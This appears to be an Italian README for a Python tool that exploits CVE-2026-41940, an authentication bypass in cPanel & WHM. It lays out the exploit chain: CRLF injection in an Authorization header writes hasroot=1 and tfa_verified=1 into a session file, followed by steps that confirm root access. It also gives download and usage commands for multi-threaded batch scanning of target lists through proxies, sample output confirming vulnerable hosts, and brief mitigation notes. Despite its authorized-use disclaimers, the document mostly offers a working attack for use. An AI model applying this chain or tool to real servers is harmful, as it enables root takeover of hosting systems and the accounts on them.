
Scanner per il bypass dell'autenticazione di cPanel & WHM (CVE-2026-41940) che rileva versioni vulnerabili tramite iniezione CRLF e manipolazione delle sessioni, con supporto multi-threading e proxy.
Scanner per Bypass dell'Autenticazione CVE-2026-41940 cPanel & WHM
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. L'utente deve rispettare le leggi e le normative locali; è severamente vietato scansionare sistemi non autorizzati. L'autore non è responsabile per qualsiasi uso improprio.
| Voce | Dettagli |
|---|
| ID CVE | CVE-2026-41940 |
| Nome Vulnerabilità | Iniezione CRLF nel File di Sessione cPanel & WHM |
| Livello di Gravità | 🔴 CRITICO (CVSS 9.8) |
| Versioni Interessate | cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5 |
| Tipo di Vulnerabilità | Bypass dell'Autenticazione → Ottenimento Privilegi Root |
| Difficoltà di Sfruttamento | Bassa |
cPanel & WHM presenta un difetto logico nella gestione dei file di sessione:
saveSession() chiama filter_sessiondata() solo dopo aver scritto il file di sessioneAuthorization: Basic contenente un'iniezione CRLFhasroot=1, tfa_verified=1✅ Rilevamento Preciso - Riproduce fedelmente la catena di sfruttamento originale
✅ Nessuna Dipendenza - Utilizza solo la libreria standard di Python
✅ Multithreading - Supporta la scansione batch
✅ Supporto Proxy - Compatibile con Burp Suite/Owasp ZAP
✅ Parsing Intelligente - Completa automaticamente protocollo e porta
✅ Output Evidenziato - Risultati delle vulnerabilità in rosso ben visibile
[1] POST /login/?login_only=1 → Ottiene sessione pre-autenticazione
[2] GET / + Iniezione CRLF → Contamina il file di sessione
[3] GET /scripts2/listaccts → Attiva il refresh della cache
[4] GET /cpsess/token/json-api/version → Verifica i privilegi Root
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py
# Completa automaticamente https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087
# Specifica URL completo
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087
# Legge i target da file
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20
# Formato targets.txt:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087
# Utilizza proxy HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080
# Scansione batch tramite proxy
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5
| Parametro | Descrizione | Esempio |
|---|---|---|
-u, --url | Target singolo | -u 1.2.3.4:2087 |
-f, --file | File con elenco target | -f targets.txt |
-t, --threads | Numero di thread (default 10) | -t 20 |
--timeout | Tempo di timeout (default 10 secondi) | --timeout 15 |
--proxy | Proxy HTTP/HTTPS | --proxy http://127.0.0.1:8080 |
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087

13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087
Lo script conferma la vulnerabilità tramite la seguente logica:
whostmgrsession/cpsess{digit}/json-api/version restituisce 200 e contiene il campo "version"⚠️ Nota: Alcuni target potrebbero restituire 500/503 e mostrare "License"; ciò indica comunque che il bypass dell'autenticazione è riuscito, ma manca la licenza commerciale.
Aggiornare immediatamente alle seguenti versioni sicure:
Misure di Mitigazione Temporanee:
/var/cpanel/sessions/ per modifiche anomaleQuesto strumento è destinato esclusivamente a test di sicurezza autorizzati e ricerca difensiva. Qualsiasi scansione non autorizzata è illegale e le conseguenze sono a carico dell'utente.
Metti ⭐ a questo progetto per ricevere aggiornamenti su altri strumenti di sicurezza!